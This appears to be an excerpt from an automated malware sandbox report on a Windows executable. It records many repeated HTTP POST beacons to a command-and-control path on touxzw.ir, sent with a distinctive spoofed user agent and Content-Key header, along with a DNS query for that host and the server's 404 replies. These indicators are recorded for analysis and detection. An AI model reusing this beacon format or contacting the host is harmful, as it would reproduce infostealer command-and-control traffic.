Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B522EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kq2Gao6aEEVU4YpaEjla0YSI9MrTb3dwHgz3P5hruyZep6sj0a2Bwqn%2FQ%2BdEOyPsIwUePpHFx6ThnmwPq6oisYgBrc%2BSitf6d1Qee7GeJyOIwzsJSjA5lDs3eUM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25e25fc642eb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrSMNXPssx75MUalSnsg7GGncYtEB31%2BUEm4TUsGX%2F%2Fd4Dj8SeNW2BMsSm7aMn76e%2BVvjHyUxaCKoGfILgUalKtjSWih0ITWaqbEVErdJDqQ5DsRiIghbG43k58%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25ef1d0f7ca5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124916&min_rtt=124916&rtt_var=62458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MyLI3q7%2FAEOJv4GlrNlYTiCQRgiyxnh%2BEoQ1hr9ZIcqWeb3kpwB%2BQJRxH9gRPeJen0HO2Z9bwVoYGx8lg8r4eVI3RZY4LLiFRu6R7mdvmJaU8Nzy5F4u7liCOjo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25f49d5f8c36-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=9478&min_rtt=9478&rtt_var=4739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E69wBaMWeoagsgbyqtg2l%2Bh8jjaynx96ZNg8eikSyd%2BZQyE1A9jTtUdRvjSe%2B2PS9UFORklS%2Fw4QEuN3kqsp6vcFNro8fepSUN4Jw5%2Fk6tL4Ya29C%2BzPXQZGAQU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26011dbb0f49-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EebD8zQDEF6DmQgpPZsFbuHFK0h8J99uqUNBiXEG9xEolG1yMrnac8C5RlDEY2D5lwGVQg7lNvS9rKDpKiA9rQRCL%2B3lLIx1byJkR8cyDkV%2B5gxc8oNOIPMWlzQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b260f8f17c477-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MIw5l8tjXhoGM2wfeWHKuirceM8H4i2oB%2F9pa2YkhqyKcqj9VyZx%2BHMDuvoaUr5%2FhyDNN5oyfKtVLHZlf%2F1oK82kREFP4u0c%2FPXrSfX8HyJP7VA3paipI926Yw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2627fc2a43f8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7t5gVaAOXgHqYf4VGzzJuqmIt26eofZ5Id5JZej4eB%2BOHVIEZAzzSzR84eqeViuAKvu92WZ6Zajrh5GQ0ndZ48LoBciu7aAA29uUVKRLzfWRzZA2y9tgVgVh4mg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b264c7dd041e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP7OHEO2JtUGsJ0XGGVrj%2BK0RqAdfxHlxmK4%2BwcLdF1Pmfczu8COSzRuLp1sVuXeEG1bTkWmOXtn1Ss4U2x7CcRUQfswJ%2BDWR8VaKYl4mrBRvl926DtDDlAF87E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26709cf20f4a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONFE%2BPUUgf9QUkOAA0nbcXmN%2FsMlc2nlfcQhBH0YPe259Z7OXywIsCo%2Fl8Xwuj4VgVpOiE1%2Fdtx9KdR9s0Q4I6y7NKljBx1H%2BIim5zXg8u03ogufaOZS8EUob5g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26889fb24307-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1739&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pltY1NYLkBXdfg7CQ8noaPJWylUy%2BCzpEfN7uX8PNe7xiHl1thgqDgNigf9dP5n9yWnoo62JmuEo%2FvtD%2Boy9pxwww635m1DrAsC3guefusOr1m36de%2Fp%2F36ABL8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2694ed037d26-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11004&min_rtt=11004&rtt_var=5502&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zPe9FJKjb2wexiRuBckLXj9LRQMRFO%2BLqclEJ9QeBQNBkfT82fNLgfZAlfl5y0ekrBZZtxkr5uF8cIoaFdnOXDdswiEUur1ZLTxQ3ghrcchxdYfYhjjfJpnBBg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26ad8d6b41db-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37189&min_rtt=37189&rtt_var=18594&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hi2T4UXx6nRCSnxZtc5hGw7jl0U6nE7Zc0lLFLFZMlW0n4SKrebqYDI%2Bt36J2pihCzgwMm%2FsQDI2vL37Yjzy5bmo4J%2FUJEI29dQpVYUq3lVdxMDyGEBVzKjdY5E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26b91a374374-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pcg8bYnRbNNd9lMKBNblxFrAVrqA3Bw%2FNun6kFndLmE3i43FgvMrSAu2C%2FLt1U%2FusgodzWY0FLv4fGOdqUrYyDhB%2FxHx4PjSPvbco05cwvXHbLFCDmfV25uFJ7I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26d10aeb4405-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p29ewD8BqJt2p3tOf%2BNkoAsnJu46QqXfnXHyklFP7kTkA300tlmyBnGhWy5Ly5ggMcxCI1NGuyDXS%2BSjG%2FViJL%2Bm2J3cSEZ2EDN%2FOl%2Fyy06wk3q3fmEEa53O33Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26dd4c980fab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjjCxvx63wI90knRo9AwyDiTdCrfJJhM4JIb07wFk%2FDWc14R37hc9D9u3zAOUbjXecK6aFZNH5XAc1CzGljb3uoB4oIloNpfv7h8zKUurKUOmgg3Ramjz%2Brrrn0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26f65e6042e3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucfdw1p0vsdX3MrPgXqONb%2F5X3U91J2pq5vFa5CvgJmg6RvStPsdQgDxFK40tiYHPRwqZ%2BuvcLuXzlCC3InG1%2BrDB3bWXLNCBVWIneju2J65cOOhu4smidzorH4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b27026f59429d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyixOu8bPJZUMHk6fKK2oks%2BZeolGsIjcDpI2F6JXA5LvSV67VXRWATVkKQFPzJAyMyvgDsKCtubuvSRrCD7bqtqFnzW1Fw0zWGKLOD2QpI2OXUsPk%2FZn3ovI00%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b270e6bc90f49-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
